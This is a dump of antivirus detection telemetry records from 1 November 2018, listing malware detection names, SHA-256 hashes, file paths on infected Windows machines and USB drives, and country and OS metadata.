  Row(detection=Row(filename='avscan-20181101-164423-a2ffb6eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-164423-A2FFB6EB', filesize=960000, name='Adware/Elex.8edb20.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:44:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160637-39612b20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8732e122\\AVSCAN-20181101-124327-EDF9E5E7\\AVSCAN-20181101-160637-39612B20', filesize=960000, name='Adware/Elex.8edb20.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:09:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-132647-b2d8c096', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8732e122\\AVSCAN-20181101-124327-EDF9E5E7\\AVSCAN-20181101-132647-B2D8C096', filesize=960000, name='Adware/Elex.8edb20.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150006-82277b66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8732e122\\AVSCAN-20181101-124327-EDF9E5E7\\AVSCAN-20181101-150006-82277B66', filesize=960000, name='Adware/Elex.8edb20.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:03:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sss.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Vugitpuwish\\_ALLOWDEL_7d9e3\\SSS.dll', filesize=960000, name='HEUR/AGEN.1031803.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:44:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gnew folder .exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\New folder\\gNew folder .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='8efcb1df9a7b33bca992cc7be4bca1c37dde38c6bc48da663ec1642e6f6d9fb8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134447-685641d4', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134447-685641D4', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.trashes.exe', filepath='H:\\.Trashes.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:15:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$recycle.bin.exe', filepath='H:\\$RECYCLE.BIN.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:15:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.fseventsd.exe', filepath='H:\\.fseventsd.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.fseventsd.exe', filepath='H:\\.fseventsd.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:15:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233016-fa38d145', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee40cc1e\\AVSCAN-20181101-232719-E449CBE6\\AVSCAN-20181101-233016-FA38D145', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:29:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233026-fb82bf52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee40cc1e\\AVSCAN-20181101-232719-E449CBE6\\AVSCAN-20181101-233026-FB82BF52', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:29:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233030-fc0a940b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee40cc1e\\AVSCAN-20181101-232719-E449CBE6\\AVSCAN-20181101-233030-FC0A940B', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='microsoft toolkit.2.5.3.exe', filepath='F:\\Microsoft Toolkit.2.5.3.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='support prt.exe', filepath='F:\\Support PRT.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autocad 2013 64-bit.exe', filepath='F:\\AutoCAD 2013 64-BIT.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fonts.exe', filepath='F:\\Fonts.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hatches.exe', filepath='F:\\Hatches.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134438-9ccb496c', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134438-9CCB496C', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-232734-e61e8b1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ee40cc1e\\AVSCAN-20181101-231948-AC4520AC\\AVSCAN-20181101-232734-E61E8B1E', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134451-884bdefc', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134451-884BDEFC', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134449-f7eedaab', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134449-F7EEDAAB', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134444-d458034c', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134444-D458034C', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8 ;0u.exe', filepath='H:\\العاب\\القرصان\\المدفع الرشاش\\8 ;0u.exe', filesize=64000, name='HEUR/Patched.Ren.#M1.#R1'), hash='8f440aa781fc95ebaa72c716ee984fa9c71417c785478b8ff0b16dce075e61ea', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T14:35:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154619-cf983fe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154619-CF983FE0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sources.pif', filepath='F:\\sources\\sources.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154610-ce259c23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154610-CE259C23', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='paparan.pif', filepath='F:\\paparan\\paparan.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pemetaan data ptk 2018.pif', filepath='F:\\Pemetaan Data PTK 2018\\Pemetaan Data PTK 2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154608-cdc5cab3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154608-CDC5CAB3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epson l120.pif', filepath='F:\\EPSON L120\\EPSON L120.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hotel puri denpasar 17-19-2018.pif', filepath='F:\\Hotel Puri Denpasar 17-19-2018\\Hotel Puri Denpasar 17-19-2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='F:\\autorun.inf\\autorun.inf.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='utn malinau 27-29 agustus 2018.pif', filepath='F:\\UTN MALINAU 27-29 AGUSTUS 2018\\UTN MALINAU 27-29 AGUSTUS 2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='verval ktt.pif', filepath='F:\\VerVal KTT\\VerVal KTT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='foto monev.exe', filepath='F:\\Foto Monev\\Foto Monev.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='materi tw i, puri denpasar kuningan 2018.pif', filepath='F:\\Materi TW I, Puri Denpasar Kuningan 2018\\Materi TW I, Puri Denpasar Kuningan 2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='penilaian pak tahap 2 periode oktober dari pak agus.exe', filepath='F:\\PENILAIAN PAK TAHAP 2 PERIODE OKTOBER DARI PAK Agus\\PENILAIAN PAK TAHAP 2 PERIODE OKTOBER DARI PAK Agus.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154613-ceaf5c87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154613-CEAF5C87', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154641-d35d8c6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154627-D114C92D\\AVSCAN-20181101-154641-D35D8C6D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154604-cd2249ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154604-CD2249AE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154617-cf5e2408', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154617-CF5E2408', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sop mh.exe', filepath='F:\\\xa0\\sop mh\\sop mh.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prangkat wokrshop kartek 2 2015.exe', filepath='F:\\\xa0\\PRANGKAT WOKRSHOP Kartek 2 2015\\PRANGKAT WOKRSHOP Kartek 2 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spy.exe', filepath='F:\\\xa0\\Spy\\Spy.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154611-ce60410b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154611-CE60410B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154636-d27d37cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154627-D114C92D\\AVSCAN-20181101-154636-D27D37CF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154615-cefde544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154615-CEFDE544', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154639-d30bdca3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154627-D114C92D\\AVSCAN-20181101-154639-D30BDCA3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pak fredy.exe', filepath='F:\\\xa0\\PAK FREDY\\PAK FREDY.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pelatihan asesor.exe', filepath='F:\\\xa0\\PELATIHAN ASESOR\\PELATIHAN ASESOR.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='borang ukk kesehatan 2015.exe', filepath='F:\\\xa0\\borang UKK kesehatan 2015\\borang UKK kesehatan 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='the marine 4.exe', filepath='F:\\\xa0\\The Marine 4\\The Marine 4.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scan.exe', filepath='F:\\\xa0\\scan\\scan.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:04Z'), dt=datetime.date(2018, 11, 1)),
